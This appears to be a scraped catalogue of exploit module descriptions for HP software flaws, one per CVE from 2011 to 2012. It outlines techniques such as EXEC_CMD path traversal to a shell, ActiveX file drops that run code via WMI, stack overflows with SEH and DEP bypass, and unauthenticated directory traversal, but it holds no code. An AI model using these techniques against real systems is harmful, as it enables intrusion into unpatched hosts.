This module exploits HP Data Protector's omniinet process, specifically against a Windows setup. When an EXEC_CMD packet is sent, omniinet.exe will attempt to look for that user-supplied filename with kernel32!FindFirstFileW(). If the file is found, the process will then go ahead and execute it with CreateProcess() under a new thread. If the filename isn't found, FindFirstFileW() will throw an error (0x03), and then bail early without triggering CreateProcess(). Because of these behaviors, if you try to supply an argument, FindFirstFileW() will look at that as part of the filename, and then bail. Please note that when you specify the 'CMD' option, the base path begins under C:\.

CVE-2011-0923
HP Data Protector 6 EXEC_CMD Remote Code Execution
This exploit abuses a vulnerability in the HP Data Protector service. This flaw allows an unauthenticated attacker to take advantage of the EXEC_CMD command and traverse back to /bin/sh, which allows arbitrary remote code execution under the context of root.

CVE-2011-1865
HP OmniInet.exe Opcode 27 Buffer Overflow
|
|
This module exploits a buffer overflow in the Hewlett-Packard OmniInet NT Service. By sending a specially crafted opcode 27 packet, a remote attacker may be able to execute arbitrary code. |
|
CVE-2011-1865
HP OmniInet.exe Opcode 20 Buffer Overflow
|
|
This module exploits a vulnerability found in HP Data Protector's OmniInet process. By supplying a long string of data as the file path with opcode '20', a buffer overflow can occur when this data is being written on the stack where no proper bounds checking is done beforehand, which results arbitrary code execution under the context of SYSTEM. This module is also made against systems such as Windows Server 2003 or Windows Server 2008 that have DEP and/or ASLR enabled by default. |
|
CVE-2011-2404
HP Easy Printer Care XMLSimpleAccessor Class ActiveX Control Remote Code Execution
|
|
This module allows remote attackers to place arbitrary files on a users file system by abusing via Directory Traversal attack the "saveXML" method from the "XMLSimpleAccessor" class in the HP Easy Printer HPTicketMgr.dll ActiveX Control (HPTicketMgr.dll 2.7.2.0). Code execution can be achieved by first uploading the payload to the remote machine embeddeding a vbs file, and then upload another mof file, which enables Windows Management Instrumentation service to execute the vbs. Please note that this module currently only works for Windows before Vista. |
|
CVE-2011-3167
HP OpenView Network Node Manager ov.dll _OVBuildPath Buffer Overflow
|
|
This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53 prior to NNM_01213 without the SSRT100649 hotfix. By specifying a long 'textFile' argument when calling the 'webappmon.exe' CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code. The vulnerable code is within the "_OVBuildPath" function within "ov.dll". There are no stack cookies, so exploitation is achieved by overwriting the saved return address. The vulnerability is due to the use of the function "_OVConcatPath" which finally uses "strcat" in a insecure way. User controlled data is concatenated to a string which contains the OpenView installation path. To achieve reliable exploitation a directory traversal in OpenView5.exe (OSVDB 44359) is being used to retrieve OpenView logs and disclose the installation path. If the installation path cannot be guessed the default installation path is used. |
|
CVE-2011-4786
HP Easy Printer Care XMLCacheMgr Class ActiveX Control Remote Code Execution
|
|
This module allows remote attackers to place arbitrary files on a users file system by abusing the "CacheDocumentXMLWithId" method from the "XMLCacheMgr" class in the HP Easy Printer HPTicketMgr.dll ActiveX Control (HPTicketMgr.dll 2.7.2.0). Code execution can be achieved by first uploading the payload to the remote machine embeddeding a vbs file, and then upload another mof file, which enables Windows Management Instrumentation service to execute the vbs. Please note that this module currently only works for Windows before Vista. |
|
CVE-2011-4789
HP Diagnostics Server magentservice.exe Overflow
|
|
This module exploits a stack buffer overflow in HP Diagnostics Server magentservice.exe service. By sending a specially crafted packet, an attacker may be able to execute arbitrary code. Originally found and posted by AbdulAziz Harir via ZDI. |
|
CVE-2012-0124
HP Data Protector Create New Folder Buffer Overflow
|
|
This module exploits a stack buffer overflow in HP Data Protector 5. The overflow occurs in the creation of new folders, where the name of the folder is handled in an insecure way by the dpwindtb.dll component. While the overflow occurs on the stack, the folder name is split into fragments in this insecure copy. Because of this, the module uses egg hunting to search for a non-corrupted copy of the payload in the heap. In addition, the overflowed buffer is stored in a frame protected by stack cookies, so an SEH handler overwrite is used. Any user of HP Data Protector Express is able to create new folders and trigger the vulnerability. Moreover, in the default installation the 'Admin' user has an empty password. Successful exploitation will lead to code execution with the privileges of the "dpwinsdr.exe" (HP Data Protector Express Domain Server Service) process, which runs as SYSTEM by default. |
|
CVE-2012-2019
HP Operations Agent Opcode coda.exe 0x34 Buffer Overflow
|
|
This module exploits a buffer overflow vulnerability in HP Operations Agent for Windows. The vulnerability exists in the HP Software Performance Core Program component (coda.exe) when parsing requests for the 0x34 opcode. This module has been tested successfully on HP Operations Agent 11.00 on Windows XP SP3 and Windows 2003 SP2 (DEP bypass). The coda.exe component listens only on localhost by default; network access must be granted through its configuration for it to be remotely exploitable. It also runs on a random TCP port, so a check function is provided to make reconnaissance easier. |
|
CVE-2012-2020
HP Operations Agent Opcode coda.exe 0x8c Buffer Overflow
|
|
This module exploits a buffer overflow vulnerability in HP Operations Agent for Windows. The vulnerability exists in the HP Software Performance Core Program component (coda.exe) when parsing requests for the 0x8c opcode. This module has been tested successfully on HP Operations Agent 11.00 on Windows XP SP3 and Windows 2003 SP2 (DEP bypass). The coda.exe component listens only on localhost by default; network access must be granted through its configuration for it to be remotely exploitable. It also runs on a random TCP port, so a check function is provided to make reconnaissance easier. |
|
CVE-2012-5201
HP Intelligent Management Center Arbitrary File Upload
|
|
This module exploits a code execution flaw in HP Intelligent Management Center. The vulnerability exists in mibFileUpload, which accepts unauthenticated file uploads and handles zip contents in an insecure way. Combining both weaknesses, a remote attacker can accomplish arbitrary file upload. This module has been tested successfully on HP Intelligent Management Center 5.1 E0202 on Windows 2003 SP2. |
|
CVE-2012-5202
HP Intelligent Management FaultDownloadServlet Directory Traversal
|
|
This module exploits a lack of authentication and a directory traversal in HP Intelligent Management, specifically in the FaultDownloadServlet, in order to retrieve arbitrary files with SYSTEM privileges. This module has been tested successfully on HP Intelligent Management Center 5.1 E0202 over Windows 2003 SP2. |
|
CVE-2012-5203
HP Intelligent Management ReportImgServlt Directory Traversal
|
|
This module exploits a lack of authentication and a directory traversal in HP Intelligent Management, specifically in the ReportImgServlt, in order to retrieve arbitrary files with SYSTEM privileges. This module has been tested successfully on HP Intelligent Management Center 5.1 E0202 over Windows 2003 SP2. |
|
CVE-2012-5204
HP Intelligent Management IctDownloadServlet Directory Traversal
|
|
This module exploits a lack of authentication and a directory traversal in HP Intelligent Management, specifically in the IctDownloadServlet, in order to retrieve arbitrary files with SYSTEM privileges. This module has been tested successfully on HP Intelligent Management Center 5.1 E0202 over Windows 2003 SP2. |